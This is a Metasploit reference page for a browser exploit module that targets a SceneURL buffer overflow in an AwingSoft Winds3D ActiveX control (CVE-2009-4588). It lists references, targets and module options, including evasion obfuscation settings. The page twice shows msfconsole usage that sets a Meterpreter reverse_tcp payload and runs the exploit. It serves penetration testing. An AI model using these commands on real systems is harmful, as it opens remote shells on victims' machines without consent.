Metasploit Penetration Testing Framework
AwingSoft Winds3D Player SceneURL Buffer Overflow
This module exploits a data segment buffer overflow within Winds3D Viewer of AwingSoft Awakening 3.x (WindsPly.ocx v3.6.0.0). This ActiveX is a plugin of AwingSoft Web3D Player. By setting an overly long value to the 'SceneURL' property, an attacker can overrun a buffer and execute arbitrary code.
Rank
- Average
Authors
- shinnai < shinnai [at] autistici.org >
- Trancer < mtrancer [at] gmail.com >
- jduck < jduck [at] metasploit.com >
References
- CVE-2009-4588
- OSVDB-60017
- http://www.milw0rm.com/exploits/9116
- http://www.shinnai.net/exploits/nsGUdeley3EHfKEV690p.txt
- http://www.rec-sec.com/2009/07/28/awingsoft-web3d-buffer-overflow/
Exploit Targets
- 0 - Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0 (default)
Development
Similar Modules
- exploit/windows/browser/adobe_flashplayer_newfunction
- exploit/windows/browser/adobe_flatedecode_predictor02
- exploit/windows/browser/adobe_geticon
- exploit/windows/browser/adobe_jbig2decode
- exploit/windows/browser/adobe_media_newplayer
- exploit/windows/browser/adobe_utilprintf
- exploit/windows/browser/aim_goaway
- exploit/windows/browser/amaya_bdo
- exploit/windows/browser/aol_ampx_convertfile
- exploit/windows/browser/aol_icq_downloadagent
Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/browser/awingsoft_web3d_bof
msf exploit(awingsoft_web3d_bof) > show payloads
msf exploit(awingsoft_web3d_bof) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(awingsoft_web3d_bof) > set LHOST [MY IP ADDRESS]
msf exploit(awingsoft_web3d_bof) > exploit
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/browser/awingsoft_web3d_bof
msf exploit(awingsoft_web3d_bof) > show payloads
msf exploit(awingsoft_web3d_bof) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(awingsoft_web3d_bof) > set LHOST [MY IP ADDRESS]
msf exploit(awingsoft_web3d_bof) > exploit
Module Options
| SRVHOST | The local host to listen on. (default: 0.0.0.0) |
| SRVPORT | The local port to listen on. (default: 8080) |
| SSL | Negotiate SSL for incoming connections |
| SSLVersion | Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) (default: SSL3) |
| URIPATH | The URI to use for this exploit (default is random) |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| EnableContextEncoding | Use transient context when encoding payloads |
| WORKSPACE | Specify the workspace for this module |
| HTML::base64 | Enable HTML obfuscation via an embeded base64 html object (accepted: none, plain, single_pad, double_pad, random_space_injection) |
| HTML::javascript::escape | Enable HTML obfuscation via HTML escaping (number of iterations) |
| HTML::unicode | Enable HTTP obfuscation via unicode (accepted: none, utf-16le, utf-16be, utf-16be-marker, utf-32le, utf-32be) |
| HTTP::chunked | Enable chunking of HTTP responses via "Transfer-Encoding: chunked" |
| HTTP::compression | Enable compression of HTTP responses via content encoding (accepted: none, gzip, deflate) |
| HTTP::header_folding | Enable folding of HTTP headers |
| HTTP::junk_headers | Enable insertion of random junk HTTP headers |
| TCP::max_send_size | Maximum tcp segment size. (0 = disable) |
| TCP::send_delay | Delays inserted before every send. (0 = disable) |
Metasploit Framework
Copyright © 2003-2010 Rapid7 LLC
Rapid7 Privacy Statement
Rapid7 Privacy Statement